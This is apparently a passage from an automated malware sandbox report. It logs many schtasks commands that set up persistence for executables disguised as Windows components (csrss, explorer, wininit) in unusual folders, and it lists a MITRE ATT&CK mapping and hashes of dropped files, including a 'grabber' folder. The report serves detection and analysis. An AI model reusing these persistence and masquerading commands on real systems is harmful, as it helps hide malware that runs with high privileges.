1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2304

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 9 /tr "'C:\Program Files\VideoLAN\VLC\plugins\dllhost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhost" /sc ONLOGON /tr "'C:\Program Files\VideoLAN\VLC\plugins\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3592

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "dllhostd" /sc MINUTE /mo 14 /tr "'C:\Program Files\VideoLAN\VLC\plugins\dllhost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4028

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4932

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1572

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3680

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1064

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 14 /tr "'C:\Program Files (x86)\Microsoft\Edge\Application\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2328

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows Mail\csrss.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3152

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrss" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Mail\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "csrssc" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Windows Mail\csrss.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5032

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 13 /tr "'C:\Program Files\Windows Portable Devices\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:516

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Program Files\Windows Portable Devices\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3640

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Portable Devices\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3012

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 7 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\OfficeClickToRun.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:436

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRun" /sc ONLOGON /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "OfficeClickToRunO" /sc MINUTE /mo 5 /tr "'C:\Program Files (x86)\Common Files\Java\Java Update\OfficeClickToRun.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1732

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 11 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4000

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininit" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2540

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "wininitw" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\wininit.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2204

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3372

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4716

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 9 /tr "'C:\Program Files (x86)\Windows Media Player\Network Sharing\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3524

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 10 /tr "'C:\Users\Admin\Music\sihost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1104

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihost" /sc ONLOGON /tr "'C:\Users\Admin\Music\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:4936

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "sihosts" /sc MINUTE /mo 6 /tr "'C:\Users\Admin\Music\sihost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:848

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 12 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\WaaSMedicAgent.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2172

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgent" /sc ONLOGON /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\WaaSMedicAgent.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3968

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "WaaSMedicAgentW" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Windows NT\Accessories\en-US\WaaSMedicAgent.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 10 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2156

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchApp" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5112

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "SearchAppS" /sc MINUTE /mo 7 /tr "'C:\Recovery\WindowsRE\SearchApp.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3364

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 11 /tr "'C:\Windows\SchCache\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2964

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Windows\SchCache\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2240

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 13 /tr "'C:\Windows\SchCache\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 6 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:3856

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHost" /sc ONLOGON /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1060

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "backgroundTaskHostb" /sc MINUTE /mo 5 /tr "'C:\Recovery\WindowsRE\backgroundTaskHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:5016

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 12 /tr "'C:\Windows\Logs\StartMenuExperienceHost.exe'" /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:2628

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHost" /sc ONLOGON /tr "'C:\Windows\Logs\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:1128

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "StartMenuExperienceHostS" /sc MINUTE /mo 6 /tr "'C:\Windows\Logs\StartMenuExperienceHost.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Scheduled Task/Job: Scheduled Task
PID:636

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program Files\Windows Multimedia Platform\services.exe

Filesize
108KB

MD5
978077216937f404216319f621dbb269

SHA1
fe700220c4eb6fff630269ef33b77c2cb03aafec

SHA256
7a86a58b8a42ea523077932cbe77e25ae21d209ba09b4a2984a0adb1e7702e9f

SHA512
1c7eea824a6aef8aa56450f2c6904c751dda40b5ed48037672b2ed4d5745e2cb7d4d6ea83795ca53627d6ea53aa802046c78078bcd53420e6f6adff216d139f8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
3eb3833f769dd890afc295b977eab4b4

SHA1
e857649b037939602c72ad003e5d3698695f436f

SHA256
c485a6e2fd17c342fca60060f47d6a5655a65a412e35e001bb5bf88d96e6e485

SHA512
c24bbc8f278478d43756807b8c584d4e3fb2289db468bc92986a489f74a8da386a667a758360a397e77e018e363be8912ac260072fa3e31117ad0599ac749e72

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0f59cccd39a3694e0e6dfd44d0fa76d

SHA1
fccd7911d463041e1168431df8823e4c4ea387c1

SHA256
70466c7f3a911368d653396fdd68f993322c69e1797b492ca00f8be34b7f3401

SHA512
5c726e1e28cb9c0c3ab963fbfbf471c6033839f3e535a3811581fdaa4da17175e5a8a8be84a4fccd99b81e048058e51d230ff3836e3ec920057a1b1676110bee

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6a807b1c91ac66f33f88a787d64904c1

SHA1
83c554c7de04a8115c9005709e5cd01fca82c5d3

SHA256
155314c1c86d8d4e5b802f1eef603c5dd4a2f7c949f069a38af5ba4959bd8256

SHA512
29f2d9f30fc081e7fe6e9fb772c810c9be0422afdc6aff5a286f49a990ededebcf0d083798c2d9f41ad8434393c6d0f5fa6df31226d9c3511ba2a41eb4a65200

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f0731f5760fdaec554ebeac92c5b858a

SHA1
4ac0a7f4cac1a8993d8d2e41490519b203272aec

SHA256
994163ee07fb3c0657229e7adbe8e3468d8f134c607552668a48660f70067e2e

SHA512
7fdbf4c8b22f2a36b32212dc41c5379496c8a4a670a6b13eeac02ebfbc394035ff25a8d79ae0a16c4f5f22bd5f59a141bb5774ba5439d1894e5363b3214dde33

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
834c66536c70fde8f5f29d44b439fe53

SHA1
1b3e9849447d30cd7cce16728bcd4a141a348c1e

SHA256
0668ff9f9590cd03e8c1c6c1c923c239d9272b7b965b74e2be726c5405fa7913

SHA512
6b33e4ea4bb883c66c674796e0ab2e4bf03db92a9fb498e7d40af1e34483046929178c46416408d04d7757f4443693007d51d50d36ff0dbda1c84a1ee4e63150

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
60ba7ac90c0e466144b48a90919960b6

SHA1
fe7f5d9e1d317f9409d8daa35d9c890f7e222d6a

SHA256
43d3c3113c66141b3a1f1f1bbf2d32a80128d029903ca58db09e9c6a9410ef9e

SHA512
92a1d912fd7be06820ec97b192b965d04ff44ff6a1c76b55405ecf20ca995762d823f52f174d8f48feb1d454716ab244adb4945febbf4fe4a6f91dd9791f87f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
0abaf75ed9de3c6a6d7bfe4433970f6b

SHA1
d776203957d89412112d46c9ce18a6ac427ff822

SHA256
fc4259f935f700a925da2c7b4c17021761f738cc1bb857a72f7efc431ab7fbe1

SHA512
02d5fba0d472cc09b85635771b34381dbe4be5712bae2a10bcf5cb65c3784314b468bb0fc795cef7447b77b887130abf740d3c27428a0963d428f799e9f1f32b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8bd23aab2f3dde6d419bc23912cedd13

SHA1
10dc192ce97798bafb97afc025fc48c87bbae61e

SHA256
f4ef5307e90a68fc6882f59f6005d8459688d1000e58594d11f576e923a0c99b

SHA512
ab80c811f3f7e8bb620732c4315eb2a42b2239fddd5ec0eafa46b005760faa3c9c0301d91330cffd8e79c49c0d3d847ce8afbafe1889f3f1822313015c8c5ff5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
a8b49ac74fc72576ad0ffc1eaa981ea5

SHA1
fd1a7b88aedc63577ddbf854bb96d58482d70559

SHA256
1b7baa2ee7472f821db1e869f6fc516c4b49917876233e582e00bf056a3bd712

SHA512
3535763c685fc6f60a607da4f1a3b314834d8f1d63619363de71b744abb3ae5b1e1ab63914b0ba04d079dd237512d9854e12d0ab2bfcf4830cc165ec9672c6d4

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ta2p4oee.v15.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\kdotFyooc.bat

Filesize
171B

MD5
e733285e71b4a9f5b4d8621db7df6982

SHA1
a7a315bd04e7115a3e7a488c1faee47480281f47

SHA256
31aa232fe84f449546d9e24f048098a33e7319e361eb9e7d2fec542612a26c46

SHA512
d39d21d62ede4d13aa0544ecacdd48ecc94755ed713eca490b6bd6e3d6961c61cb7873ed382716bf5178eba7139366e8ea6deb84ad2fde0630b98f78578a46ba

Download Submit
C:\Users\Admin\AppData\Roaming\grabber\svchost.exe

Filesize
4KB

MD5
3abc237a050e33baa885be13427e9ed3

SHA1
924ca9d38466f8da7dfec49b55e92805d67dd811

SHA256
6f8af6cb9289ac92ac1de99bdcdd3a9a964713e916c85697f10f2cbc0c5daea1

SHA512
3b6a9ada854cf59023e45d2fc41e91781cda5caff7141ee8ad927d7bd3f9c6410d55059eaacd0dd3a3c799cd3f86c876767f506528f67b17f3e2ab9290c9fb09

Download Submit
C:\Users\Admin\AppData\Roaming\runtime.bat

Filesize
104KB

MD5
8158350247e35657cbccf5054d8a6d33

SHA1
b2cbd3a164a21d168b281a43646a08f4717539af

SHA256
8d4934d75e3a578b2e836507ae1fd02fa67e33c79f5a784c2ead91fecc2fb8f0

SHA512
f772a497baaf2f73b4fa2565abc7e536ce1d505c51271646532662d89f1ee34ad593ffaebc99d67f343e4973268efea7b8bf6cd9f274c4266278fc0e71b04aff

Download Submit
memory/3092-240-0x000000001D320000-0x000000001D326000-memory.dmp

Filesize
24KB

Download
memory/3092-239-0x000000001D310000-0x000000001D316000-memory.dmp

Filesize
24KB

Download
memory/3740-33-0x000001F20BD60000-0x000001F20BD82000-memory.dmp

Filesize
136KB

Download
memory/4676-0-0x00007FFEB71D3000-0x00007FFEB71D5000-memory.dmp

Filesize
8KB

Download
memory/4676-6-0x000000001C9D0000-0x000000001C9DE000-memory.dmp

Filesize
56KB

Download
memory/4676-5-0x000000001C9C0000-0x000000001C9CC000-memory.dmp

Filesize
48KB

Download
memory/4676-7-0x000000001CA50000-0x000000001CA5C000-memory.dmp

Filesize
48KB

Download
memory/4676-27-0x00007FFEB71D0000-0x00007FFEB7C92000-memory.dmp

Filesize
10.8MB

Download
memory/4676-4-0x00000000014E0000-0x00000000014EA000-memory.dmp

Filesize
40KB

Download
memory/4676-3-0x000000001C070000-0x000000001C170000-memory.dmp

Filesize
1024KB

Download
memory/4676-2-0x00007FFEB71D0000-0x00007FFEB7C92000-memory.dmp

Filesize
10.8MB

Download
memory/4676-1-0x0000000000BD0000-0x0000000000BF4000-memory.dmp

Filesize
144KB

Download
memory/5676-255-0x0000000000100000-0x0000000000108000-memory.dmp

Filesize
32KB

Download
memory/5740-267-0x0000028DFB570000-0x0000028DFBD16000-memory.dmp

Filesize
7.6MB

Download